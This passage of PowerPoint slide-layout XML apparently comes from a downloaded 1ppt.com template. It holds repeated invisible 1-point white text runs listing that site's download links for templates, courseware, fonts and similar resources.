              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout153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53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53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53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5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54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54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54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54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54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54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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout154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54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54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54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5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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout155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55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55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55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55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55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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
